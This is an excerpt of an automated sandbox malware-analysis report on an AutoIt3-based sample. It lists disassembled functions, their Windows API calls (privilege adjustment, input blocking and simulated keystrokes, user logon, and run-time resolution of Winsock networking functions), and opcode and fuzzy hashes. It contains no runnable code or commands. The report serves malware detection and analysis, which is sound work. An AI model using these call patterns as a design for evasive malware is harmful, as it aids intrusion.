                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 6786fed80c1e3c631f56705c9bf7580b6097461e3b12ceada6e72e6fcd270ed4
                                      • Instruction ID: 6d9a5159dbd31b017f3f12d6e6a662e0f498de539f47aa4932833f3ea949b5bb
                                      • Opcode Fuzzy Hash: 6786fed80c1e3c631f56705c9bf7580b6097461e3b12ceada6e72e6fcd270ed4
                                      • Instruction Fuzzy Hash: 9341E871504319FFEB20DE54DC85EBBB7ACFB40724F10805AF609E6149E671EE819A60
                                      Function 0086B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B986
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0086B9E0
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0086BA2D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 6cf56572e51ee0ed69c7cea4ad04fac54c0df958dd185c08a1d14c031464840f
                                      • Instruction ID: 83be0312a0eee4f936063bcd42480ed4a9bf40e09966abec6dd477fd72ab5793
                                      • Opcode Fuzzy Hash: 6cf56572e51ee0ed69c7cea4ad04fac54c0df958dd185c08a1d14c031464840f
                                      • Instruction Fuzzy Hash: 63218E75A00118EFCB00EFA9DC85AADFBB8FF48311F1480AAE905E7251DB319955CB51
                                      Function 00859399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00820FE6: std::exception::exception.LIBCMT ref: 0082101C
                                        • Part of subcall function 00820FE6: __CxxThrowException@8.LIBCMT ref: 00821031
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008593E3
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00859410
                                      • GetLastError.KERNEL32 ref: 0085941D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                      • String ID:
                                      • API String ID: 1922334811-0
                                      • Opcode ID: fc48b2577e834738e38435cd0538269ea6c394ec14be5cacb35683f04c058a41
                                      • Instruction ID: 6dbb3cc868521ea6014f71fd6fc89cc1200b3ed0d57963b408a70072b8b9258a
                                      • Opcode Fuzzy Hash: fc48b2577e834738e38435cd0538269ea6c394ec14be5cacb35683f04c058a41
                                      • Instruction Fuzzy Hash: 0811C1B1414208EFD728EF64EC85D2BB7BCFB44311B24812EF48987281EB30AC41CB60
                                      Function 008642D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008642FF
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 0086433C
                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00864345
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 3dccfd9eb49705b1ee9032df9a1ca310be9f3f92c35b3bbd22790e6e59b1d905
                                      • Instruction ID: 9887641383940eaa7cef38f710083149b80f836c6f14133cbb46eb1d9cbc2682
                                      • Opcode Fuzzy Hash: 3dccfd9eb49705b1ee9032df9a1ca310be9f3f92c35b3bbd22790e6e59b1d905
                                      • Instruction Fuzzy Hash: 0F11A5B2D00229BFE7109BE8DC44FAFBBBCFB09710F150256B914E7290C2745D008BA5
                                      Function 00864F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00864F45
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00864F5C
                                      • FreeSid.ADVAPI32(?), ref: 00864F6C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: fb5572185a92ce0e5e13778051d780deb1cb10694e7010b5dac3830d57689b09
                                      • Instruction ID: 736007d71f45527820e39141ec6465c71637f9deb7742702b1a9138f4d04ba64
                                      • Opcode Fuzzy Hash: fb5572185a92ce0e5e13778051d780deb1cb10694e7010b5dac3830d57689b09
                                      • Instruction Fuzzy Hash: 43F04975A1130CBFDF00DFE0DC89AAEBBBCFF08201F1044A9AA01E2180E7346A048B50
                                      Function 0086494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,0084FC86), ref: 0086495A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086496B
                                      • FindClose.KERNEL32(00000000), ref: 0086497B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFind$AttributesCloseFirst
                                      • String ID:
                                      • API String ID: 48322524-0
                                      • Opcode ID: 7f03c40342ed8c50702de1cedcca834bed4f2e5e1fd5fd0526d78f1395c01334
                                      • Instruction ID: 9854a8d74dfec033086daa7bcabb69dd209a9fb3eba0706c29ce390cb5841940
                                      • Opcode Fuzzy Hash: 7f03c40342ed8c50702de1cedcca834bed4f2e5e1fd5fd0526d78f1395c01334
                                      • Instruction Fuzzy Hash: 7BE0DF32850505AF82107738EC0D8EE7B5CFE06339F240B06FA36C21E0EB7099448A96
                                      Function 0086CD14 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086CD3E
                                      • FindClose.KERNEL32(00000000), ref: 0086CD6E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 722b1fdf86d58171f3557173ffa0b17217d41f72b907fa633e1779755f22e4d7
                                      • Instruction ID: c45148df3a78412f44d8b651fc1b6f0794d6573530ef0d8c90758fc3d6019b24
                                      • Opcode Fuzzy Hash: 722b1fdf86d58171f3557173ffa0b17217d41f72b907fa633e1779755f22e4d7
                                      • Instruction Fuzzy Hash: 7E11A1716006009FD710EF29DC45A2AF7E4FF84325F14851EF9A9C7291CB30AC00CB81
                                      Function 00861AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00861B01
                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00861B14
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: e8c0d806f6100b78748480d0e7171ac00b0ed291c2b8259f69bce8b13afc96bc
                                      • Instruction ID: ead5e9680c09be559137f435cb8d4cba2314b97983ade83693940e491f4a8b7d
                                      • Opcode Fuzzy Hash: e8c0d806f6100b78748480d0e7171ac00b0ed291c2b8259f69bce8b13afc96bc
                                      • Instruction Fuzzy Hash: 9AF0377190020DAFDB00DF94C806BBEBBB4FF04316F04804AF955A6292D3799615DF94
                                      Function 0086A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00879B52,?,0089098C,?), ref: 0086A6DA
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00879B52,?,0089098C,?), ref: 0086A6EC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 00d8f626c42796ef564d1752b41808a154ae6670d6bac9981033f58ffd7013a0
                                      • Instruction ID: c4403c92372f61f25932d376b89da2159cfe2db705438fc06b443e46a3a262ee
                                      • Opcode Fuzzy Hash: 00d8f626c42796ef564d1752b41808a154ae6670d6bac9981033f58ffd7013a0
                                      • Instruction Fuzzy Hash: B0F05E3551422DABDB21AFA4DC48FEA776CFF09761F008156B908D6191D6309940CFA1
                                      Function 00858DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858F27), ref: 00858DFE
                                      • CloseHandle.KERNEL32(?,?,00858F27), ref: 00858E10
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 1614a19eb2d6a93524ddbaf8103185f6edd2c915d4db65eaf3aa20020a583eef
                                      • Instruction ID: 763965ecff871b820fb5358ee83ed4345237993f3856439232321c8a614f44c3
                                      • Opcode Fuzzy Hash: 1614a19eb2d6a93524ddbaf8103185f6edd2c915d4db65eaf3aa20020a583eef
                                      • Instruction Fuzzy Hash: 6DE0BF76010A10EFEB252B55FC09D7777ADFB04311724891AF499C0470DB615CD0DB50
                                      Function 0082A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00828F87,?,?,?,00000001), ref: 0082A38A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0082A393
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f36c841c4a5650c854c919803430a4da60d5f611427cf1db4f0dead0ccf4a204
                                      • Instruction ID: bafa3b90152da0ff90f436668224aa6236dd30776b5114c0eefc4311314e17e7
                                      • Opcode Fuzzy Hash: f36c841c4a5650c854c919803430a4da60d5f611427cf1db4f0dead0ccf4a204
                                      • Instruction Fuzzy Hash: 20B09232064208EFCA403BE1EC09B883F68FB44B62F044012F61D44260CB625450AE91
                                      Function 008745D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 008745F0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: acca2cb8d12f668e09d2adfb710325c1dec7f54cf48cad9bbb821a2e86bce622
                                      • Instruction ID: d4e5815c187b26812ee268104676e84ebce8977c4965b7d60af859f49c71ba39
                                      • Opcode Fuzzy Hash: acca2cb8d12f668e09d2adfb710325c1dec7f54cf48cad9bbb821a2e86bce622
                                      • Instruction Fuzzy Hash: 4EE0DF312002199FC300AF59E800A8BF7E8FF94760F00C016FC09CB350DB70E8008BA1
                                      Function 008651E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00865205
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: 974d4e61e3cd8fec64f6f9ef0332546b714a632b7a871cf5cb34547d5a6c5929
                                      • Instruction ID: 48e3092067a7f84bebbd23e52cd191ea06e947cc9b35e6074a674b6909f34e46
                                      • Opcode Fuzzy Hash: 974d4e61e3cd8fec64f6f9ef0332546b714a632b7a871cf5cb34547d5a6c5929
                                      • Instruction Fuzzy Hash: 9CD092A5160E0A79EE5817289E1FF763688F3037C5F9A464A7142D90C2FCD46886A832
                                      Function 00859369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858FA7), ref: 00859389
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: 591456a2887a0293120db5c87293efa1b23ad801bd1d34357358ffd8ac425ec2
                                      • Instruction ID: 426cbb9bfa0646ca6820c1ac978c6367ac17c829c946291d42777be37afcb71b
                                      • Opcode Fuzzy Hash: 591456a2887a0293120db5c87293efa1b23ad801bd1d34357358ffd8ac425ec2
                                      • Instruction Fuzzy Hash: F3D05E3226490EAFEF019EA4DC01EAE3B69EB04B01F408111FE15C50A0C775D835AF60
                                      Function 00840722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00840734
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: aac41399fb70ef76d0e5fd05b7f7245d28ba0a388567a99d5fe301a6122cc6b3
                                      • Instruction ID: 1a63166860f6ad7427f15dc9828614c4a2b454d842eab47ded859241d98e009c
                                      • Opcode Fuzzy Hash: aac41399fb70ef76d0e5fd05b7f7245d28ba0a388567a99d5fe301a6122cc6b3
                                      • Instruction Fuzzy Hash: A4C04CF180050DDFCB05DBA0D988EEF77BCBB04308F140056A105F2100D7749B448E71
                                      Function 0082A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0082A35A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: e5f573994149376ebb23d01d7d328065476e4be194f1616437d58c84a5bc4347
                                      • Instruction ID: 35474d232629ab98aa08cc020ddff79eacff9bcf9728bf1a1016db4cdc3b3b72
                                      • Opcode Fuzzy Hash: e5f573994149376ebb23d01d7d328065476e4be194f1616437d58c84a5bc4347
                                      • Instruction Fuzzy Hash: 3EA0113002020CEB8A002BA2EC08888BFACEA002A0B008022F80C002228B32A820AA80
                                      Function 03CDC13C Relevance: 145.5, APIs: 43, Strings: 40, Instructions: 284libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,00000000,03CDC54A,?,00000000,03CDC567), ref: 03CDC1B4
                                      • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 03CDC1CC
                                      • GetProcAddress.KERNEL32(00000000,__WSAFDIsSet), ref: 03CDC1DE
                                      • GetProcAddress.KERNEL32(00000000,closesocket), ref: 03CDC1F0
                                      • GetProcAddress.KERNEL32(00000000,ioctlsocket), ref: 03CDC202
                                      • GetProcAddress.KERNEL32(00000000,WSAGetLastError), ref: 03CDC214
                                      • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 03CDC226
                                      • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 03CDC238
                                      • GetProcAddress.KERNEL32(00000000,accept), ref: 03CDC24A
                                      • GetProcAddress.KERNEL32(00000000,bind), ref: 03CDC25C
                                      • GetProcAddress.KERNEL32(00000000,connect), ref: 03CDC26E
                                      • GetProcAddress.KERNEL32(00000000,getpeername), ref: 03CDC280
                                      • GetProcAddress.KERNEL32(00000000,getsockname), ref: 03CDC292
                                      • GetProcAddress.KERNEL32(00000000,getsockopt), ref: 03CDC2A4
                                      • GetProcAddress.KERNEL32(00000000,htonl), ref: 03CDC2B6
                                      • GetProcAddress.KERNEL32(00000000,htons), ref: 03CDC2C8
                                      • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 03CDC2DA
                                      • GetProcAddress.KERNEL32(00000000,inet_ntoa), ref: 03CDC2EC
                                      • GetProcAddress.KERNEL32(00000000,listen), ref: 03CDC2FE
                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 03CDC310
                                      • GetProcAddress.KERNEL32(00000000,ntohs), ref: 03CDC322
                                      • GetProcAddress.KERNEL32(00000000,recv), ref: 03CDC334
                                      • GetProcAddress.KERNEL32(00000000,recvfrom), ref: 03CDC346
                                      • GetProcAddress.KERNEL32(00000000,select), ref: 03CDC358
                                      • GetProcAddress.KERNEL32(00000000,send), ref: 03CDC36A
                                      • GetProcAddress.KERNEL32(00000000,sendto), ref: 03CDC37C
                                      • GetProcAddress.KERNEL32(00000000,setsockopt), ref: 03CDC38E
                                      • GetProcAddress.KERNEL32(00000000,shutdown), ref: 03CDC3A0
                                      • GetProcAddress.KERNEL32(00000000,socket), ref: 03CDC3B2
                                      • GetProcAddress.KERNEL32(00000000,gethostbyaddr), ref: 03CDC3C4
                                      • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 03CDC3D6
                                      • GetProcAddress.KERNEL32(00000000,getprotobyname), ref: 03CDC3E8
                                      • GetProcAddress.KERNEL32(00000000,getprotobynumber), ref: 03CDC3FA
                                      • GetProcAddress.KERNEL32(00000000,getservbyname), ref: 03CDC40C
                                      • GetProcAddress.KERNEL32(00000000,getservbyport), ref: 03CDC41E
                                      • GetProcAddress.KERNEL32(00000000,gethostname), ref: 03CDC430
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 03CDC442
                                      • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 03CDC454
